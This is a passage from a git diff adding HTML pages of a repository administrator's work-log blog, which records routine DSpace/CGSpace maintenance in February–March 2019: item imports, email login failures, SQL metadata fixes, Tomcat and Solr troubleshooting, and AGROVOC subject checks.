+</ul>
+</li>
+</ul>
+<h2 id="2019-02-28">2019-02-28</h2>
+<ul>
+<li>I helped Sisay upload the nineteen CTA records from last week via the command line because they required mappings (which is not possible to do via the batch upload web interface)</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e swebshet@stfu.org -s /home/swebshet/Thumbnails_feb_2019 -m 2019-02-28-CTA-Thumbnails.map
+</code></pre><ul>
+<li>Mails from CGSpace stopped working, looks like ICT changed the password again or we got locked out <em>sigh</em></li>
+<li>Now I&rsquo;m getting this message when trying to use DSpace&rsquo;s <code>test-email</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace test-email
+
+About to send test email:
+ - To: stfu@google.com
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+</code></pre><ul>
+<li>I&rsquo;ve tried to log in with the last two passwords that ICT reset it to earlier this month, but they are not working</li>
+<li>I sent a mail to ILRI ICT to check if we&rsquo;re locked out or reset the password again</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-03/index.html b/docs/2019-03/index.html
new file mode 100644
index 000000000..5a263b4c8
--- /dev/null
+++ b/docs/2019-03/index.html
@@ -0,0 +1,1262 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2019" />
+<meta property="og:description" content="2019-03-01
+
+I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good
+I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;
+Looking at the other half of Udana&rsquo;s WLE records from 2018-11
+
+I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)
+I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items
+Most worryingly, there are encoding errors in the abstracts for eleven items, for example:
+68.15% � 9.45 instead of 68.15% ± 9.45
+2003�2013 instead of 2003–2013
+
+
+I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-03/" />
+<meta property="article:published_time" content="2019-03-01T12:16:30+01:00" />
+<meta property="article:modified_time" content="2020-07-24T21:57:55+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2019"/>
+<meta name="twitter:description" content="2019-03-01
+
+I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good
+I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;
+Looking at the other half of Udana&rsquo;s WLE records from 2018-11
+
+I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)
+I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items
+Most worryingly, there are encoding errors in the abstracts for eleven items, for example:
+68.15% � 9.45 instead of 68.15% ± 9.45
+2003�2013 instead of 2003–2013
+
+
+I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-03/",
+  "wordCount": "7105",
+  "datePublished": "2019-03-01T12:16:30+01:00",
+  "dateModified": "2020-07-24T21:57:55+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-03/">
+
+    <title>March, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-03/">March, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-03-01T12:16:30+01:00">Fri Mar 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-03-01">2019-03-01</h2>
+<ul>
+<li>I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good</li>
+<li>I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;</li>
+<li>Looking at the other half of Udana&rsquo;s WLE records from 2018-11
+<ul>
+<li>I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)</li>
+<li>I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items</li>
+<li>Most worryingly, there are encoding errors in the abstracts for eleven items, for example:</li>
+<li>68.15% � 9.45 instead of 68.15% ± 9.45</li>
+<li>2003�2013 instead of 2003–2013</li>
+</ul>
+</li>
+<li>I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs</li>
+</ul>
+<h2 id="2019-03-03">2019-03-03</h2>
+<ul>
+<li>Trying to finally upload IITA&rsquo;s 259 Feb 14 items to CGSpace so I exported them from DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ mkdir 2019-03-03-IITA-Feb14
+$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-03-03-IITA-Feb14
+</code></pre><ul>
+<li>As I was inspecting the archive I noticed that there were some problems with the bitsreams:
+<ul>
+<li>First, Sisay didn&rsquo;t include the bitstream descriptions</li>
+<li>Second, only five items had bitstreams and I remember in the discussion with IITA that there should have been nine!</li>
+<li>I had to refer to the original CSV from January to find the file names, then download and add them to the export contents manually!</li>
+</ul>
+</li>
+<li>After adding the missing bitstreams and descriptions manually I tested them again locally, then imported them to a temporary collection on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -c 10568/99832 -e aorth@stfu.com -m 2019-03-03-IITA-Feb14.map -s /tmp/2019-03-03-IITA-Feb14
+</code></pre><ul>
+<li>DSpace&rsquo;s export function doesn&rsquo;t include the collections for some reason, so you need to import them somewhere first, then export the collection metadata and re-map the items to proper owning collections based on their types using OpenRefine or something</li>
+<li>After re-importing to CGSpace to apply the mappings, I deleted the collection on DSpace Test and ran the <code>dspace cleanup</code> script</li>
+<li>Merge the IITA research theme changes from last month to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/413">#413</a>)
+<ul>
+<li>I will deploy to CGSpace soon and then think about how to batch tag all IITA&rsquo;s existing items with this metadata</li>
+</ul>
+</li>
+<li>Deploy Tomcat 7.0.93 on CGSpace (linode18) after having tested it on DSpace Test (linode19) for a week</li>
+</ul>
+<h2 id="2019-03-06">2019-03-06</h2>
+<ul>
+<li>Abenet was having problems with a CIP user account, I think that the user could not register</li>
+<li>I suspect it&rsquo;s related to the email issue that ICT hasn&rsquo;t responded about since last week</li>
+<li>As I thought, I still cannot send emails from CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace test-email
+
+About to send test email:
+ - To: blah@stfu.com
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+</code></pre><ul>
+<li>I will send a follow-up to ICT to ask them to reset the password</li>
+</ul>
+<h2 id="2019-03-07">2019-03-07</h2>
+<ul>
+<li>ICT reset the email password and I confirmed that it is working now</li>
+<li>Generate a controlled vocabulary of 1187 AGROVOC subjects from the top 1500 that I checked last month, dumping the terms themselves using <code>csvcut</code> and then applying XML controlled vocabulary format in vim and then checking with tidy for good measure:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c name 2019-02-22-subjects.csv &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
+$ # apply formatting in XML file
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
+</code></pre><ul>
+<li>I tested the AGROVOC controlled vocabulary locally and will deploy it on DSpace Test soon so people can see it</li>
+<li>Atmire noticed my message about the &ldquo;solr_update_time_stamp&rdquo; error on the dspace-tech mailing list and created an issue on their tracker to discuss it with me
+<ul>
+<li>They say the error is harmless, but has nevertheless been fixed in their newer module versions</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-08">2019-03-08</h2>
+<ul>
+<li>There&rsquo;s an issue with CGSpace right now where all items are giving a blank page in the XMLUI
+<ul>
+<li><del>Interestingly, if I check an item in the REST API it is also mostly blank: only the title and the ID!</del> On second thought I realize I probably was just seeing the default view without any &ldquo;expands&rdquo;</li>
+<li>I don&rsquo;t see anything unusual in the Tomcat logs, though there are thousands of those <code>solr_update_time_stamp</code> errors:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># journalctl -u tomcat7 | grep -c &#39;Multiple update components target the same field:solr_update_time_stamp&#39;
+1076
+</code></pre><ul>
+<li>I restarted Tomcat and it&rsquo;s OK now&hellip;</li>
+<li>Skype meeting with Peter and Abenet and Sisay
+<ul>
+<li>We want to try to crowd source the correction of invalid AGROVOC terms starting with the ~313 invalid ones from our top 1500</li>
+<li>We will share a Google Docs spreadsheet with the partners and ask them to mark the deletions and corrections</li>
+<li>Abenet and Alan to spend some time identifying correct DCTERMS fields to move to, with preference over CG Core 2.0 as we want to be globally compliant (use information from SEO crosswalks)</li>
+<li>I need to follow up on the privacy page that Sisay worked on</li>
+<li>We want to try to migrate the 600 <a href="https://livestock.cgiar.org">Livestock CRP blog posts</a> to CGSpace, Peter will try to export the XML from WordPress so I can try to parse it with a script</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-03-09">2019-03-09</h2>
+<ul>
+<li>I shared a post on Yammer informing our editors to try to AGROVOC controlled list</li>
+<li>The SPDX legal committee had a meeting and discussed the addition of CC-BY-ND-3.0-IGO and other IGO licenses to their list, but it seems unlikely (<a href="https://github.com/spdx/license-list-XML/issues/767#issuecomment-470709673">spdx/license-list-XML/issues/767</a>)</li>
+<li>The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms</li>
+<li>I see 46 occurrences of these with this query:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE &#39;%http://feedburner.%&#39; OR text_value LIKE &#39;%http://feeds.feedburner.%&#39;);
+</code></pre><ul>
+<li>I can replace these globally using the following SQL:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feedburner.&#39;,&#39;https//feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feedburner.%&#39;;
+UPDATE 43
+dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feeds.feedburner.&#39;,&#39;https//feeds.feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feeds.feedburner.%&#39;;
+UPDATE 44
+</code></pre><ul>
+<li>I ran the corrections on CGSpace and DSpace Test</li>
+</ul>
+<h2 id="2019-03-10">2019-03-10</h2>
+<ul>
+<li>Working on tagging IITA&rsquo;s items with their new research theme (<code>cg.identifier.iitatheme</code>) based on their existing IITA subjects (see <a href="/cgspace-notes/2018-02/">notes from 2019-02</a>)</li>
+<li>I exported the entire IITA community from CGSpace and then used <code>csvcut</code> to extract only the needed fields:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c &#39;id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]&#39; ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
+</code></pre><ul>
+<li>
+<p>After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a <code>||</code>)</p>
+</li>
+<li>
+<p>I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>if(isBlank(value), &#39;PLANT PRODUCTION &amp; HEALTH&#39;, value + &#39;||PLANT PRODUCTION &amp; HEALTH&#39;)
+</code></pre><ul>
+<li>Then it&rsquo;s more annoying because there are four IITA subject columns&hellip;</li>
+<li>In total this would add research themes to 1,755 items</li>
+<li>I want to double check one last time with Bosede that they would like to do this, because I also see that this will tag a few hundred items from the 1970s and 1980s</li>
+</ul>
+<h2 id="2019-03-11">2019-03-11</h2>
+<ul>
+<li>Bosede said that she would like the IITA research theme tagging only for items since 2015, which would be 256 items</li>
+</ul>
+<h2 id="2019-03-12">2019-03-12</h2>
+<ul>
+<li>I imported the changes to 256 of IITA&rsquo;s records on CGSpace</li>
+</ul>
+<h2 id="2019-03-14">2019-03-14</h2>
+<ul>
+<li>CGSpace had the same issue with blank items like earlier this month and I restarted Tomcat to fix it</li>
+<li>Create a pull request to change Swaziland to Eswatini and Macedonia to North Macedonia (<a href="https://github.com/ilri/DSpace/pull/414">#414</a>)
+<ul>
+<li>I see thirty-six items using Swaziland country metadata, and Peter says we should change only those from 2018 and 2019</li>
+<li>I think that I could get the resource IDs from SQL and then export them using <code>dspace metadata-export</code>&hellip;</li>
+</ul>
+</li>
+<li>This is a bit ugly, but it works (using the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL helper function</a> to resolve ID to handle):</li>
+</ul>
+<pre tabindex="0"><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE &#39;%SWAZILAND%&#39;&#34; | grep -oE &#39;[0-9]{3,}&#39;); do
+
+    echo &#34;Getting handle for id: ${id}&#34;
+
+    handle=$(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT ds5_item2itemhandle($id)&#34; | grep -oE &#39;[0-9]{5}/[0-9]+&#39;)
+
+    ~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
+
+done
+</code></pre><ul>
+<li>Then I couldn&rsquo;t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -oE &#39;201[89]&#39; /tmp/*.csv | sort -u
+/tmp/94834.csv:2018
+/tmp/95615.csv:2018
+/tmp/96747.csv:2018
+</code></pre><ul>
+<li>And looking at those items more closely, only one of them has an <em>issue date</em> of after 2018-04, so I will only update that one (as the countrie&rsquo;s name only changed in 2018-04)</li>
+<li>Run all system updates and reboot linode20</li>
+<li>Follow up with Felix from Earlham to see if he&rsquo;s done testing DSpace Test with COPO so I can re-sync the server from CGSpace</li>
+</ul>
+<h2 id="2019-03-15">2019-03-15</h2>
+<ul>
+<li>CGSpace (linode18) has the blank page error again</li>
+<li>I&rsquo;m not sure if it&rsquo;s related, but I see the following error in DSpace&rsquo;s log:</li>
+</ul>
+<pre tabindex="0"><code>2019-03-15 14:09:32,685 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
+java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is closed.
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.checkOpen(DelegatingConnection.java:398)
+        at org.apache.tomcat.dbcp.dbcp.DelegatingConnection.prepareStatement(DelegatingConnection.java:279)
+        at org.apache.tomcat.dbcp.dbcp.PoolingDataSource$PoolGuardConnectionWrapper.prepareStatement(PoolingDataSource.java:313)
+        at org.dspace.storage.rdbms.DatabaseManager.queryTable(DatabaseManager.java:220)
+        at org.dspace.authorize.AuthorizeManager.getPolicies(AuthorizeManager.java:612)
+        at org.dspace.content.crosswalk.METSRightsCrosswalk.disseminateElement(METSRightsCrosswalk.java:154)
+        at org.dspace.content.crosswalk.METSRightsCrosswalk.disseminateElement(METSRightsCrosswalk.java:300)
+</code></pre><ul>
+<li>Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, <del>but spikes of over 1,000 today</del>, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently</li>
+</ul>
+<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-0* | awk -F: &#39;{print $1}&#39; | sort | uniq -c | tail -n 25
+      5 dspace.log.2019-02-27
+     11 dspace.log.2019-02-28
+     29 dspace.log.2019-03-01
+     24 dspace.log.2019-03-02
+     41 dspace.log.2019-03-03
+     11 dspace.log.2019-03-04
+      9 dspace.log.2019-03-05
+     15 dspace.log.2019-03-06
+      7 dspace.log.2019-03-07
+      9 dspace.log.2019-03-08
+     22 dspace.log.2019-03-09
+     23 dspace.log.2019-03-10
+     18 dspace.log.2019-03-11
+     13 dspace.log.2019-03-12
+     10 dspace.log.2019-03-13
+     25 dspace.log.2019-03-14
+     12 dspace.log.2019-03-15
+     67 dspace.log.2019-03-16
+     72 dspace.log.2019-03-17
+      8 dspace.log.2019-03-18
+     15 dspace.log.2019-03-19
+     21 dspace.log.2019-03-20
+     29 dspace.log.2019-03-21
+     41 dspace.log.2019-03-22
+   4807 dspace.log.2019-03-23
+</code></pre><ul>
+<li>(Update on 2019-03-23 to use correct grep query)</li>
+<li>There are not too many connections currently in PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      6 dspaceApi
+     10 dspaceCli
+     15 dspaceWeb
+</code></pre><ul>
+<li>I didn&rsquo;t see anything interesting in the PostgreSQL logs, though this stack trace from the Tomcat logs (in the systemd journal) from earlier today <em>might</em> be related?</li>
+</ul>
+<pre tabindex="0"><code>SEVERE: Servlet.service() for servlet [spring] in context with path [] threw exception [org.springframework.web.util.NestedServletException: Request processing failed; nested exception is java.util.EmptyStackException] with root cause
+java.util.EmptyStackException
+        at java.util.Stack.peek(Stack.java:102)
+        at java.util.Stack.pop(Stack.java:84)
+        at org.apache.cocoon.callstack.CallStack.leave(CallStack.java:54)
+        at org.apache.cocoon.servletservice.CallStackHelper.leaveServlet(CallStackHelper.java:85)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:484)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+        at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
+        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202)
+        at com.sun.proxy.$Proxy90.service(Unknown Source)
+        at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+        at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1180)
+        at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:950)
+        at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
+        at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
+        at org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:778)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:624)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.rdf.negotiation.NegotiationFilter.doFilter(NegotiationFilter.java:59)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
+        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
+        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:494)
+        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
+        at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:234)
+        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
+        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1137)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+        at java.lang.Thread.run(Thread.java:748)
+</code></pre><ul>
+<li>For now I will just restart Tomcat&hellip;</li>
+</ul>
+<h2 id="2019-03-17">2019-03-17</h2>
+<ul>
+<li>Last week Felix from Earlham said that they finished testing on DSpace Test (linode19) so I made backups of some things there and re-deployed the system on Ubuntu 18.04
+<ul>
+<li>During re-deployment I hit a few issues with the <a href="https://github.com/ilri/rmg-ansible-public">Ansible playbooks</a> and made some minor improvements</li>
+<li>There seems to be an <a href="https://bugs.launchpad.net/ubuntu/+source/nodejs/+bug/1794589">issue with nodejs&rsquo;s dependencies now</a>, which causes npm to get uninstalled when installing the certbot dependencies (due to a conflict in libssl dependencies)</li>
+<li>I re-worked the playbooks to use Node.js from the upstream official repository for now</li>
+</ul>
+</li>
+<li>Create and merge pull request for the AGROVOC controlled list (<a href="https://github.com/ilri/DSpace/pull/415">#415</a>)
+<ul>
+<li>Run all system updates on CGSpace (linode18) and re-deploy the <code>5_x-prod</code> branch and reboot the server</li>
+</ul>
+</li>
+<li>Re-sync DSpace Test with a fresh database snapshot and assetstore from CGSpace
+<ul>
+<li>After restarting Tomcat, Solr was giving the &ldquo;Error opening new searcher&rdquo; error for all cores</li>
+<li>I stopped Tomcat, added <code>ulimit -v unlimited</code> to the <code>catalina.sh</code> script and deleted all old locks in the DSpace <code>solr</code> directory and then DSpace started up normally</li>
+<li>I&rsquo;m still not exactly sure why I see this error and if the <code>ulimit</code> trick actually helps, as the <code>tomcat7.service</code> has <code>LimitAS=infinity</code> anyways (and from checking the PID&rsquo;s limits file in <code>/proc</code> it seems to be applied)</li>
+<li>Then I noticed that the item displays were blank&hellip; so I checked the database info and saw there were some unfinished migrations</li>
+<li>I&rsquo;m not entirely sure if it&rsquo;s related, but I tried to delete the old migrations and then force running the ignored ones like when we upgraded to <a href="/cgspace-notes/2018-06/">DSpace 5.8 in 2018-06</a> and then after restarting Tomcat I could see the item displays again</li>
+</ul>
+</li>
+<li>I copied the 2019 Solr statistics core from CGSpace to DSpace Test and it works (and is only 5.5GB currently), so now we have some useful stats on DSpace Test for the CUA module and the dspace-statistics-api</li>
+<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace cleanup -v
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(164496) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code># su - postgres
+$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);&#39;
+UPDATE 1
+</code></pre><h2 id="2019-03-18">2019-03-18</h2>
+<ul>
+<li>I noticed that the regular expression for validating lines from input files in my <code>agrovoc-lookup.py</code> script was skipping characters with accents, etc, so I changed it to use the <code>\w</code> character class for words instead of trying to match <code>[A-Z]</code> etc&hellip;
+<ul>
+<li>We have a Spanish and French subjects so this is very important</li>
+<li>Also there were some subjects with apostrophes, dashes, and periods&hellip; these are probably invalid AGROVOC subject terms, but we should save them to the rejects file instead of skipping them nevertheless</li>
+</ul>
+</li>
+<li>Dump top 1500 subjects from CGSpace to try one more time to generate a list of invalid terms using my <code>agrovoc-lookup.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-03-18-top-1500-subject.csv WITH CSV HEADER;
+COPY 1500
+dspace=# \q
+$ csvcut -c text_value /tmp/2019-03-18-top-1500-subject.csv &gt; 2019-03-18-top-1500-subject.csv
+$ ./agrovoc-lookup.py -l en -i 2019-03-18-top-1500-subject.csv -om /tmp/en-subjects-matched.txt -or /tmp/en-subjects-unmatched.txt
+$ ./agrovoc-lookup.py -l es -i 2019-03-18-top-1500-subject.csv -om /tmp/es-subjects-matched.txt -or /tmp/es-subjects-unmatched.txt
+$ ./agrovoc-lookup.py -l fr -i 2019-03-18-top-1500-subject.csv -om /tmp/fr-subjects-matched.txt -or /tmp/fr-subjects-unmatched.txt
+$ cat /tmp/*-subjects-matched.txt | sort -u &gt; /tmp/subjects-matched-sorted.txt
+$ wc -l /tmp/subjects-matched-sorted.txt                                                              
+1318 /tmp/subjects-matched-sorted.txt
+$ sort -u 2019-03-18-top-1500-subject.csv &gt; /tmp/1500-subjects-sorted.txt
+$ comm -13 /tmp/subjects-matched-sorted.txt /tmp/1500-subjects-sorted.txt &gt; 2019-03-18-subjects-unmatched.txt
+$ wc -l 2019-03-18-subjects-unmatched.txt
+182 2019-03-18-subjects-unmatched.txt
+</code></pre><ul>
+<li>So the new total of matched terms with the updated regex is 1317 and unmatched is 183 (previous number of matched terms was 1187)</li>
